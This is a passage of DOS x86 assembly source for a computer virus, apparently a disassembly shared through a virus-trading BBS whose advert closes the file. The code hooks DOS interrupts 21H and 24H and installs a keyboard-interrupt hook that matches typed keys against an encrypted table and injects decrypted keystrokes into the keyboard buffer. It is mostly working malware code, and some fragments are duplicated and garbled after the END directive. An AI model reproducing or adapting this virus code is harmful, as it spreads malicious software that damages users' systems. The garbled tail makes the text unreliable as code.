MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
LDS DX,INT_24 ; Original interrupt 24H address
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
BP0530: POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
JMP INT_21 ; Interrupt 21H
; Interrupt 16H routine
BP0540: PUSHF ; Fake an interrupt
CMP AH,0 ; Get a token function?
JE BP0550 ; Branch if yes
POPF ; Fake interrupt not needed
JMP INT_16 ; Pass on to original interrupt
BP0550: CALL INT_16 ; Deal with original interrupt
PUSH AX
PUSH BX
PUSH DI
PUSH DS
PUSH ES
PUSH CS ; \ Set DS to CS
POP DS ; /
XOR BX,BX ; \ Set ES to zero
MOV ES,BX ; /
ASSUME DS:CODE,ES:RAM
CMP OUT_SW,0 ; Is output switch on?
JNE BP0630 ; Branch if yes
OR AL,20H ; Convert to lower case
XOR AL,0AFH ; Decrypt character
MOV DI,OFFSET TABLE ; Address first entry
BP0560: CMP BYTE PTR [DI],0 ; Is this the end of the table?
JE BP0590 ; Branch if yes
XOR BX,BX ; Clear register
MOV BL,[DI+1] ; Get current character pointer
ADD BX,[DI+2] ; Add current entry pointer
CMP AL,[BX] ; Is character the one we want?
JE BP0570 ; Branch if yes
MOV BYTE PTR [DI+1],0 ; Clear character pointer
JMP BP0580
BP0570: INC BYTE PTR [DI+1]
BP0580: ADD DI,4 ; Next entry
JMP BP0560 ; Process next entry
BP0590: MOV DI,OFFSET TABLE ; Address first entry
BP0600: CMP BYTE PTR [DI],0 ; Is this the end of the table?
JE BP0610 ; Branch if yes
MOV AL,[DI+1] ; Get current character pointer
CMP AL,[DI] ; Do we have a complete match?
JNE BP0620 ; Branch if not
MOV TABOUT,DI ; Save relevant pointer
INC OUT_SW ; Set on output switch
MOV AX,40H ; \ Address RAM
MOV ES,AX ; /
ASSUME ES:RAM40
MOV AX,BW041A ; Get key token in pointer
MOV BW041C,AX ; Set key token out pointer
CALL BP0640 ; Put a character into the buffer
BP0610: POP ES
POP DS
POP DI
POP BX
POP AX
IRET
BP0620: ADD DI,4 ; Next entry
JMP BP0600 ; Process next entry
BP0630: MOV AX,40H ; \ Address RAM
MOV ES,AX ; /
CALL BP0640 ; Put a character into the buffer
XOR BX,BX ; Clear register
MOV BL,[DI+1] ; Get current character pointer
ADD BX,[DI+2] ; Add entry pointer
CMP BYTE PTR [BX],0 ; Was that the last character?
JNE BP0610 ; Branch if not
MOV OUT_SW,0 ; Set off output switch
JMP BP0610
BP0640: MOV DI,TABOUT ; Address relevant table entry
XOR BX,BX ; Clear register
MOV BL,[DI+1] ; Get current character pointer
ADD BX,[DI+2] ; Add entry pointer
MOV AL,[BX] ; Get the character
XOR AL,0AFH ; Decrypt character
INC BYTE PTR [DI+1] ; Next character
MOV AH,AL ; Copy for translate
MOV BX,OFFSET KEYTAB ; Address key number table
XLAT ; Get key number
XCHG AH,AL ; Reserve order
MOV BX,BW041C ; Get key token out pointer
MOV ES:[BX],AX ; Put key token into buffer
INC BX ; \ Next buffer position
INC BX ; /
CMP BX,BW0482 ; Passed end of buffer?
JNE BP0650 ; Branch if not
MOV BX,BW0480 ; Get buffer start
BP0650: MOV BW041C,BX ; Save new key token out pointer
RET
; Stack area - This is also necessary to make the virus a complete
; number of paragraphs
DB 04CH, 002H, 0AAH, 031H, 09EH, 002H, 0A5H, 031H
ENDADR EQU $
CODE ENDS
END START
ete
; number of paragraphs
DB 04CH,
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ